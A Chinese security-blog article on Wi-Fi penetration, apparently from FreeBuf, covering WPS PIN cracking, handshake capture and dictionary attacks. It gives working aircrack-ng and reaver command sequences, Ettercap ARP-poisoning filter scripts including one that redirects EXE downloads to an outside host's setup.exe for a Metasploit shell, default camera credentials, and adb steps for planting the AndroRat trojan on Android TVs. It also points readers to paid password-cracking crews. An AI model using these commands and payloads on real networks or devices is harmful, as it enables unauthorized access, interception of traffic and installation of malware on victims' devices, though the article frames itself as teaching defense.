Wi-Fi安全近年来成为热点话题,“免费WiFi暗藏李鬼”“WiFi钓鱼”事件层出不穷。如何安全的使用Wifi?未知攻,焉知防?了解Wifi渗透知识必不可少,本文为你娓娓道来(附送实战案例)。 [本文由作者mobier原创并投稿,转载请注明来自FreeBuf.COM] 0×00 前言 什么是钓鱼Wi-Fi?看看百度怎么说:
钓鱼Wi-Fi ,愈来愈多的网友通过公共场所的Wi-Fi来获取资讯,不成想“蹭网”有风险,网上曝出Wi-Fi也能“钓鱼”窃取网银账号、密码等的消息,专家表示通过Wi-Fi进行网络支付网友只要选择来源明确的网络, 
写这篇文章的初衷也是一篇文章http://daily.zhihu.com/story/4126951,看到狗哥的这篇文章不禁生发感触,不过我还是想说一句不一定免费的wifi才有风险哦。 0×01 让小绵羊知道自己是怎么被黑的 路由器wps功能漏洞  路由器使用者往往会因为步骤太过麻烦,以致干脆不做任何加密安全设定,因而引发许多安全上的问题。WPS用于简化Wi-Fi无线的安全设置和网络管理。 它支持两种模式:个人识别码(PIN)模式和按钮(PBC)模式。路由器在出产时默认都开启了wps但这真的安全么! 在2011年12月28日,一名名叫StefanViehbock的安全专家宣布,自己发现了无线路由器中的WPS(Wi-FiProtected Setup)漏洞,利用这个漏洞可以轻易地在几小时内PJWPS使用的PIN码以连上无线路由器的Wifi网络。 个人识别码(PIN) 有人可能会问了什么是pin码?WPS技术会随机产生一个八位数字的字符串作为个人识别号码(PIN)也就是你路由底部除了后台地址账号密码之后的一组八位数的数字,通过它可以快速登录而不需要输入路由器名称和密码等。 Pin码会分成前半四码和后半四码。前四码如果错误的话,那路由器就会直接送出错误讯息,而不会继续看后四码,意味着试到正确的前四码,最多只需要试 10000 组号码。一旦没有错误讯息,就表示前四码是正确的,而我们便可以开始尝试后四码。 后四码比前四码还要简单,因为八码中的最后一码是检查码,由前面七个数字产生,因此实际上要试的只有三个数字,共一千个组合。这使得原本最高应该可达一千万组的密码组合(七位数+检查码),瞬间缩减到仅剩 11,000 组,大幅降低PJ所需的时间。 根据路由MAC地址算出默认pin码 另外有种更快PJwifi的方法就是根据路由MAC地址(MAC是路由器的物理地址,是唯一的识别标志)算出默认出产时的pin码例如以下软件 还可以通过别人共享的找到pin码!http://mac-pin.456vv.net/ 

抓取握手包PJ 提前条件是有客户端连接wifi,另外作者是不会讲PJwep的,使用的小伙伴好自为之。 就简单介绍下原理吧: 一个TCP包走进一家酒吧,对服务员说:“给我来瓶啤酒”。服务员说:“你要来瓶啤酒?”。TCP包说:“是的,来瓶啤酒”服务员说:“好的” 1、当一个无线客户端与一个无线AP连接时,先发出连接认证请求(握手申请:你好!)2、无线AP收到请求以后,将一段随机信息发送给无线客户端(你是?)3、无线客户端将接收到的这段随机信息进行加密之后再发送给无线AP (这是我的名片)4、无线AP检查加密的结果是否正确,如果正确则同意连接(哦~原来是自己人呀!)通常我们说的抓“握手包”,是指在无线AP与它的一个合法客户端在进行认证时,捕获“信息原文”和加密后的“密文”。 利用Deauth验证攻击。也就是说强制让合法无线客户端与AP被断开,当它被从WLAN 中断开后,这个无线客户端会自动尝试重新连接到AP上,在这个重新连接过程中,数据包通信就产生了,然后利用airodump捕获一个无线路由器与无线客户端四次握手的过程,生成一个包含四次握手的cap包。然后再利用字典进行暴力PJ。 另外也提下关于这行的黑色产业。当我们抓到带数据的握手包时,这时候黑色产业往往会帮我们很大的忙,GPU速度也是我们普通设备跑密码的速度上百倍。所以我是不建议自己跑密码的! 把包发给那些团队,跑的出密码才收10-30rmb不等的费用(根据需要跑的密码定价分普通包还有金刚包,普通包的字典只使用十个G的字典,金刚包会使用五十G以上的字典收费也会偏贵些)不过也有一些团队会收取电费(既跑不跑的出密码都会收取一定的费用)。另外这样的设备非常耗电不是一般人的消耗的起的哦,一般闲置的时候会利用这样的机器挖矿。 

分布式PJ 《骇客追缉令》片中的主人公都是有使用到分布式PJ的。 拿电影中的米特尼克来说吧,剧情中他拿到下村勉的加密后的密文,一般电脑来说要跑出密码需要几十年至几百年的时间才有机会跑出密码,此时的米特尼克利用伪装欺骗了某大学保安,偷偷的潜入进去使用大学中的超级电脑,只使用了几个小时就能到了想要的结果! 《血色星期一》中的主角三浦春马使用了傀儡网络(肉鸡)使他在半个小时拿到了密码。(两部电影因为太久没看了可能有些地方说错了见谅) 于2009年9月26日晚ZerOne无线安全团队与AnyWlan无线门户成功完成国内首次分布式PJ项目。 地址:http://www.freebuf.com/tools/38668.html
工具附上!另外想说是分布式PJ只是思路,不是PJ方案。破不出来也没有关系。 Wifi万能钥匙 or wifi分享 其实我是十分不愿意提到这款流氓软件的,但这也是大部分网友主要的PJwifi的途径。为什么我不愿意提这款软件而又必须提到呢? 答:这款最流氓的功能也就是这款软件最核心的功能就是集成了全国各地的wifi账号密码。这必定包括一些恶意分享和一些无意分享出来的使用这款软件开始的时候有两个选项。 一、自动分享热点;二、分享前提示我。默认是选择一的。有些心急PJwifi的小伙伴可能看到没看就直接点击了下一步,将自己本机保存的wifi账号无意间公之于众。酱紫即使wifi密码强度在强也会因为猪一样的队友团灭。这样误操作的例子真的很多,不得不提到的就是这款软件强大的集成了全国各地的wifi账号密码。当你使用这款软件的时候,可以很方便的根据附近的ssid.mac地址在万能钥匙的数据库中找到正确的密码。这方便了用户也方便了不怀好意的童鞋。 小米科技也试着模仿盛大的万能钥匙,可最终还是死在了摇篮里。 13年9月5日晚间消息,小米科技今日年度发布会上发布的MIUI新功能——Wifi密码自助分享引发争议,众多网友指责小米此行为将导致Wifi严重安全隐患,有咖啡店主甚至指责小米此行为如同偷窃。 从2013-8-2开始到发布会截止前,一个月就分享了32万个公共Wi-Fi密码,可想而知后续这个雪球会滚得更加大。微博网友@王伟 也对这个新功能十分愤怒,他表示:“我们只剩下两个选择:1、拒绝向使用小米手机的朋友提供家里/公司的wifi密码。2、使用小米手机的朋友离开之后马上更改家里\公司的wifi密码。” 另外为什么万能钥匙没有遭到封杀我也不得而知了,但我想劝大家一句,迫不得已千万不要依靠万能钥匙。 弱密码 WPA-PSK的密码空间用浩瀚来形容一点不为过,所以直接进行字典攻击是傻子的行为。但是作为一个密码对字典攻击来说有强密码和弱密码的区别。强密码就是PJ希望极其渺茫的密码;弱密码是很有希望PJ的密码当然强弱也是个相对概念,他也是依赖于加安全制的。银行的密码一般都为6 位,像这样密码空间如此小的密码,普通情况下都为弱密码。但是银行的ATM 一天只让你试三次,三次密码不对锁卡。有这样的机制6 位的就不再是弱密码了,由弱密码组成的字典叫弱密码字典。 http://www.freebuf.com/articles/web/42120.html 这篇文章讲的更为详细! 有一定联系性规律性密码 例子:有人曾破如此一个WPA-PSK 密码IX1V7051242。如果你不了解这个密码的背景你肯能会觉得很神奇,这么强的密码也能破。这样的密码是在西班牙的tele2 这样的AP 上有,而且这样AP_ESSID 里都有tele2 字段。这样的密码后面的8 位是相同的有真正的密码只有四位。四位密码其密码空间很小很容易被字典攻击出来。这个也是AP的默认密码。所以这个密码被PJ是因为AP本身产生的随机密码就是个弱密码。是AP的厂家自己降低了安全性的做法。例如有一些餐厅、酒店、事业单位等等,SSID总会改成名字的拼音,密码当然是跟ssid相关的。最常见的就是这个单位的电话号码! 社会工程学 有目的性的社工师多多少少都掌握着WIFI使用者的个人信息,不然怎么会叫做有目的的社工师呢。 说白了,就是将跟目标有关系的人生日组合,姓名缩写(即开头字母)、姓名拼音、手机号码、一般目标的恋爱对象、暗恋对象、重要的人、不排除基友、成功率最高,还有目标的姓名、生日、手机号码、邮箱号码、网名(即ID,这招对黑阔很管用)、习惯用的字符,当然还有常用的密码!!!.还有一些特殊号码、特殊日子(结婚纪念日、开始恋爱)等等资料生成一个字典。 举一个例子一位在安全圈混的一位小黑阔,具有很高的安全意识,知道AP要使用一个很强大的密码比如hack!@#1024。但他这个人比较懒到那都使用着这个密码,然后这位黑阔在某个论坛某个网站注册了账号习惯性的输入了引以为傲的强密码,然后这些网站被黑(拖库)社工师根据密码生成了一个字典(根据泄露出来密码进行组合)然后就不用我多说了。 这样的例子不少!《剑鱼行动》中那个黑客是如何在一分钟进入国家安全信息网的啊。就是网络上工作着为他收集密码的程序。而他就是通过这样的字典迅速PJ的。而这样的字典真正的黑客也是不愿意发布出来的。 0×02 实例 抓取握手包PJ 
找个测试目标,另外网卡的选择也十分重要,一般使用笔记本内置网卡PJ的话一定要看一下网卡型号kali有没有驱动。我用的是8187卡,kali自带驱动我就不说了。 本次的实例是根据抓握手包PJ进行的 
Airmon-ngstart wlan0 意思是启动网卡的监听模式。敲完这条命令后设备名 wlan=mon0 一般命令后都是要跟上设备名。 
Airodump-ngmon0 在抓包前肯定是要先选择目标。这条命令的意思是探测无线网络,选好目标,首选是客户端连接多的,复制好BSSID即MAC地址,记住信道(CH)。 
Airodump-ng-c 1 –bssid XX:XX:XX:XX:XX -w mobi mon0 -C参数是选择目标信道。如果该信道就目标一个AP使用的话不用加上–bssid,这个参数是为了跟精准的锁定目标。 -w 是保存握手包的名字,获取后会在当前目录生成一个mobi-01.cap的握手包。这时就不用关闭这条shell而是另外打开一个shell。 
Aireplay-ng-0 10 -a (AP的mac)-c (客户端的mac) -0参数是发起deauth攻击.10 是次数可以调节-a 即第一条shell中BSSID.下面的AP路由器MAC地址-c 即STATION下客户机的MAC地址(这条为可选项)

Aircrack-ng-w /pentest/passwords/sxsx.lst mobi-01.cap -w 选择字典 mobi-01.cap 即抓到的握手包 Ps:我是不建议自己跑密码的。我直接挂载u盘吧握手包copy到u盘里在通过QQ方式吧包发给跑包团队。 然后是吧正确密码添加到了我的字典里。才会出现上图(既成功PJ后的图)! 另外是密码使用有一定联系性规律性密码。 PJ方案二:利用路由器wps功能漏洞 Airodump-ngmon0 查看附近无线情况。使用wash -i mon0 -C可查看是否开启了wps功能。 Reaver -i mon0 -b xx:xx:xx:xx-vv reaver命令参数 -i 监听后接口名称-b 目标mac地址-a 自动检测目标AP最佳配置-S 使用最小的DH key(可以提高PJ速度)-vv 显示更多的非严重警告-d 即delay每穷举一次的闲置时间 预设为1秒-t 即timeout每次穷举等待反馈的最长时间-c 指定频道可以方便找到信号,如-c1 指定1频道,大家查看自己的目标频道做相应修改 (非TP-LINK路由推荐–d9 –t9 参数防止路由僵死示例:
reaver -i mon0 -b MAC -a -S –d9 –t9 -vv应因状况调整参数(-c后面都已目标频道为1作为例子) 目标信号非常好: reaver -i mon0 -b MAC -a -S -vv -d0 -c 1
目标信号普通: reaver -i mon0 -b MAC -a -S -vv -d2 -t 5 -c 1
目标信号一般: reaver -i mon0 -b MAC -a -S -vv -d5 -c 1
0×03 渗透测试案例 
在发文章前已经提交给厂商,有兴趣的小伙伴可以关注下。在FreeBuf分享的是技术过程,望大家能涨姿势。 Arp大杀器 Ettercap有四种界面,Text,Curses,GTK2 ,Daemonize。 Text界面相当于我们常说的命令行界面,只显示字符。其启动参数为-T。通常与其配套的参数有-q。(安静模式)若加上了该选项,则不会显示抓到数据包的内容。 Curses和GTK2是图形化界面,可以用鼠标点的,在此略过。。。 Daemonize是守护模式,相当于在后台运行。 arp毒化有双向(remote)和单向(oneway)两种方式。 双向方式将对两个目标的ARP缓存都进行毒化,对两者之间的通信进行监听。单向方式只会监听从第一个目标到第二个目标的单向通信内容。一般来说,我们会选择使用双向欺骗的方式来获取所有的数据包进行嗅探分析。例如:-M arp:remote /10.0.0.2/ // 表示对10.0.0.2的所有端口的通信进行嗅探,包括发出的数据包和收到的数据包。若目标主机开启了ARP防火墙怎么办?直接欺骗会引发报警且无效果。这时就是单向ARP毒化大显神威的时候了。只要路由器没有对IP和MAC进行绑定,我们就可以只欺骗路由器,使从路由器发给目标主机的数据包经过中间人,完成我们的攻击。 首先先介绍下Ettercap。例如DNS服务欺骗,替换网页中内容(网页元素&下载文件&插入脚本)并可配合ssltrip突破ssl加密截获密码。 一个强大的Ettercap肯定是要配合一个强大的过滤脚本。下面介绍一下Ettercap过滤脚本。 下面是对一个网页内容进行的替换,使用方法举一个例子吧。可将网页上的图片、视频、音乐替换成自己指定的。某君表白就用了这个,恶作剧也是非常管用的。一个大晚上的夜晚正看着电视机突然被切换成各种灵异的视频,发出了各种惊悚的音乐下面是找的一些过滤规则。可根据下面修改! if (ip.proto== TCP && tcp.dst == 80) {if (search(DATA.data, "Accept-Encoding")){replace("Accept-Encoding", "Accept-Rubbish!");# note: replacement string is same length as originalstring#msg("zapped Accept-Encoding!\n");}}if (ip.proto== TCP && tcp.src == 80) {replace("img src=", "imgsrc=http://bbs.isilic.org/static/image/common/logo.png' ");replace("IMG SRC=", "imgsrc=http://bbs.isilic.org/static/image/common/logo.png' ");msg("过滤执行.\n");}这个替换下载EXE文件的规则配合msf可直接拿shell。 if (ip.proto== TCP && tcp.dst == 80) {if (search(DATA.data, "Accept-Encoding")){replace("Accept-Encoding", "Accept-Mousecat");msg("zapped Accept-Encoding!\n");}}if (ip.proto== TCP && tcp.src == 80) {replace("keep-alive", "close" ");replace("Keep-Alive", "close" ");}if (ip.proto== TCP && search(DATA.data, ":application") ){msg("found EXE\n");if (search(DATA.data, "Win32")){msg("doing nothing\n");} else {replace("200 OK", "301 Moved Permanently Location:http://bbs.isilic.org/setup.exe");msg("redirect success\n");}}Ettercap提供的一些常用的函数有: search(where, what) 从字符串where中查找what,若找到则返回trueregex(where, regex) 从字符串where中匹配正则表达式regex,若找到则返回truereplace(what, with) 把字符串what替换成字符串withlog(what, where) 把字符串what记录到where文件中msg(message) 在屏幕上显示出字符串messageexit() 退出最后过滤的规则要经过编译后才可使用!
etterfilterwe.filter -o exe.ef We.filter 过滤规则 Exe.ef 编译后的文件  Ettercap -iwlan 4 -Tq -M arp // -i选择设置-T 文本界面-Q 安静模式-M 攻击方式-F 选择过滤脚本 即之前编译的 exe.ef// 选择目标 /要欺骗的主机ip/ /要欺骗的网关/ //=选择子网 我就不附上效果图了。 

配合driftnet效果十分猥琐,可根据图片分析是个怎么样的人,在浏览什么类型的网站。= =不多说了,这工具太猥琐了。 我就不过分深入了就证明下而已,毕竟人家也是搞安全,多少给别人留的面子。另外Ettercap存在栈缓冲区溢出漏洞。低版本的童靴小心被反爆菊了!! 

FreeBuf小编:已智能和谐不雅图片两张,不用谢 监控 进入到一个内网时首先使用nmap扫一下端口8000,37777,37778。 一般要使用专门监控连接软件8000:海康卫视 admin:12345 另外海康卫视部分产品是存在后门的如果密码被修改后可根据日期算出超级密码! 欢迎补充。 电视盒子 5555端口(android默认远程调试端口)为android tv 出厂设置远程调试端口,通过该端口进行对智能电视的系统进行安装,卸载,修改应用。 通过局域网远程端口进行连接到智能电视,并安装恶意软件或其它操作: (1) adb connect 192.168.0.111:5555(2) adb push su /system/xbin pm set-install-location 0 (su工具通过root权限运行后可以进行静默安装,在屏幕上无显示界面)(3) adb install superuser.apk (超级用户授权工具)(4) adb install busybox.apk (系统命令执行工具箱)(5) adb install AndroRat.apk(android远程控制木马)(6) 通过服务端进行控制0×04 防御只是一个步骤,安全是一个系统 
看我任何突MAC封锁!  客户机的截图模拟主人使用MAC过滤功能! 

在路由器上使用mac过滤黑客就一点办法的没有了么?no! 
由于路由器只接受白名单的数据包,所以kali无法从dns服务器获取到域名IP。 


伪装MAC地址上网由于有两个无线客户端,所有的数据包都会发送至两个客户端,难免会出现数据包丢失的!这也是智能路由的防蹭网功能只是换了个名字。 关闭dhcpserver真的有用么? 
首先我先模拟WIFI的管理员吧,DHCP关了,并且设置了一个只有自己知道的网关IP。 
可以清楚的看到kali并不在管理员使用的网段内,但在OSI二层环境中kali抓取了路由器与客户端的ARP报文。
|